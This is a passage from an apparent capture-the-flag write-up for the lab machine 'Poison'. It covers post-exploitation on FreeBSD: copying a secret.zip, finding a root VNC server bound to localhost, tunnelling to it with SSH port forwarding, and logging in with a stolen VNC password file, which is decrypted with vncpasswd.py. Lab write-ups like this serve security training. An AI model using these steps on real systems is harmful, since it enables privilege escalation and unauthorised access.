Post Exploitation

Since this is the freeBSD OS, LinEnum won't work, we will have to do this manually :(

Copy the secret.zip to your current directory form charix.

scp charix@10.10.10.84:/home/charix/secret.zip .

The file required a password, using the password we found earlier, we can extract the file. We'll leave this for now

Enumeration of system

ps -aux

This shows us that there is a vnc process running as root

Viewing the entire process

 ps -auxww | grep vnc

charix@Poison:~ % ps -auxww | grep vnc
root   529   0.0  0.9  23620  8868 v0- I    14:20    0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 809   0.0  0.2  14828  2372  1  S+   15:13    0:00.00 grep vnc

rfbport is the port which vnc is listening on, which in this case is 5901.

We can verify with netstat

root@kali: ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

The above command allocates a socket to listen to port 5000 on localhost from my attack machine (kali). Whenever a connection is made to port 5000, the connection is forwarded over a secure channel and is made to port 5901 on localhost on the target machine (poison).

Connecting to VNC

vncviewer 127.0.0.1:5000

Something cool about VNC is that you can you a password file to authenticate to the vnc server. We found a password file earlier, remember? Let's try that bad boy out.

vncviewer 127.0.0.1:5000 -passwd secret

You can actually decode that password file with the following github repo

GitHub - trinitronx/vncpasswd.py: A Python implementation of vncpasswd, w/decryption abilities & extra features ;-)GitHub

python vncpasswd.py -d -f ../../htb/poison/secret